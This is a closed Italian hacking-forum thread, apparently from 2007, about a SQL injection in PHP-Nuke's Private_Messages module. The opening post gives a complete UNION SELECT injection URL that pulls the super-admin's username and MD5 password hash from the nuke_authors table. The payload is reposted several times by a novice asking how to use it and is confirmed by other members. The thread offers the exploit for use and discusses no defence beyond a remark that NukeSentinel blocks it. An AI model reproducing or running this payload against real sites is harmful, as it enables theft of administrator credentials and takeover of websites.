PHP Nuke - SQL Injection

Stato
Discussione chiusa ad ulteriori risposte.

murdercode_imported

Utente Electrum
10 Giugno 2007
174
11
4
101
Codice:
http://victima/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
 
Praticamente questo "Link" sfrutta una vulnerabilità dei messaggi privati, permettendo di prendere la md5 dell'admin...almeno dallo script mi sembra faccia questo ;)

Corregetemi se sbaglio :D
 
se c'è nuke sentinel viene bloccato l'accesso al sito.

con quali versioni di phpnuke va? con tutte?
 
Langy ha detto:
se c'è nuke sentinel viene bloccato l'accesso al sito.

con quali versioni di phpnuke va? con tutte?

Beh non credo che Murder posti vulnerabilità di software vecchio :lol: ! Sarà sicuramente per le versioni 7.9 e/o 8.0 appena posso me lo provo in locale :D
 
quindi devo mettere nella barra dell'url questo:


http://ilnome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

?
grazie
 
ciao69 ha detto:
quindi devo mettere nella barra dell'url questo:


http://ilnome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

?
grazie

Va prima a presentarti e poi avrai una risposta.
 
ok :cry1::cry1:
ciao mi sono presentato !
Vorrei sapere se quell'inj deve essere compilata così:
http://nomeforum.forumconphp.it/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*


o così:

http://nome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*


Poi non ho capito se disabilita gli mp dell'adm o da la password md5 dell'adm, perchè muerdercode dice la prima
e TeKing la seconda.

Rispondete grazie


grazie 1000
 
ciao69 ha detto:
http://nome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

mi chiedo come questo possa funzionare... hai presente che cosa è un URL???
:slick1:
vabbè cmq è l'altra ;)
 
ciao69 ha detto:
ok :cry1::cry1:
ciao mi sono presentato !
Vorrei sapere se quell'inj deve essere compilata così:
http://nomeforum.forumconphp.it/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*


o così:

http://nome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*


Poi non ho capito se disabilita gli mp dell'adm o da la password md5 dell'adm, perchè muerdercode dice la prima
e TeKing la seconda.

Rispondete grazie


grazie 1000

 
AlexBio ha detto:
ciao69 ha detto:
http://nome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

mi chiedo come questo possa funzionare... hai presente che cosa è un URL???
:slick1:
vabbè cmq è l'altra ;)



1)mi chiedo come possa funzionare significa che secondo te nn funziona?
2)Ma questo url blocca gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm?
 
e siamo a 3... non cercare di capire come si usa se non sai cos'è....

studia!
 
volevo chiedere visto che ci sono state opinioni diverse se visitando questo url si bloccano gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm?
 
ciao69 ha detto:
1)mi chiedo come possa funzionare significa che secondo te nn funziona?
2)Ma questo url blocca gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm?

io mi chiedo come puoi fare qualcosa se non sai neanche come funziona un url.

In questo forum ci sono molte guide incomincia da li.

Se nessun utente ti risponde fa bene perchè tu sei proprio a livelli zero, fatti prima una lettura di tutte le guide sul forum e poi posta le tue domande.
 
li ho visti i tutorial e anche molti non solo su infernet-x.
Cmq volevo solamente sapere se questo url blocca gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm.
E' solo per sapere se mi può servire o no!
Non è fatto di capire perchè è una sql injection che murdercode dice che questo url blocca gli mp dell'adm mentre un'altro dice che ti da l'md5 della password dell'adm.

Solo lo scopo voglio sapere.
 
"se questo url blocca gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm."

questa frase non ha senso O.O
 
allora murdecode diceva che questo url blocca gli mp dell'adm, mentre un'altro utente nello stesso topic diceva che invece ti da l'hash md5 della password dell'adm.
 
ciao69 ha detto:
li ho visti i tutorial e anche molti non solo su infernet-x.
Cmq volevo solamente sapere se questo url blocca gli mp dell'adm (muerd.)o ti da l'md5 della password (utente che non ricordo) dell'adm.
E' solo per sapere se mi può servire o no!
Non è fatto di capire perchè è una sql injection che murdercode dice che questo url blocca gli mp dell'adm mentre un'altro dice che ti da l'md5 della password dell'adm.

Solo lo scopo voglio sapere.

Secondo te questo ha senso???

Codice:
http://nome dell'adm/

e poi cosa significa questo???

Codice:
99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

Sei sicuro di aver letto qualche tutorial???

Codice:
E' solo per sapere se mi può servire o no!

Di certo tu non ci fai proprio niente visto che non hai le basi neanche per navigare in internet.

Scusa ma perchè non studi prima, stai solo facendo delle figuraccie.
 
state esagerando la cosa ....
Prima ho sbagliato con i miei 2 post...
volevo sapere se ti blocca gli mp dell'adm o ti dà l'hash in md5 della password dell'adm pazzo, visto che murdecode dice una cosa e TeKIng un'altra.
http://www.infernet-x.com/php-nuke-sql-injection-t-1145.html
 
ciao69 ha detto:
AlexBio ha detto:
ciao69 ha detto:
http://nome dell'adm/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null, null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*

mi chiedo come questo possa funzionare... hai presente che cosa è un URL???
:slick1:
vabbè cmq è l'altra ;)
1)mi chiedo come possa funzionare significa che secondo te nn funziona?

no, vuol dire che non ha senso... per questo ti ho chiesto se sai che cosa è un url... :slick1:
 
certo ...
o mi sò sbagliato !!!!!!!!!!
leggevo la firma di murd. che diceva che i mp verranno cestinati.
Ok raga scusate tanto quindi ciò che fa questo link è sfruttare una vulnerabilità dei messaggi privati, permettendo di prendere la md5 dell'admin. Come diceva TeKing.

Scusate ancora !!!!!!!!!!!!!!!!!!!
LOOOL che sono stato !!
Sarà l'orario ...
 
Stato
Discussione chiusa ad ulteriori risposte.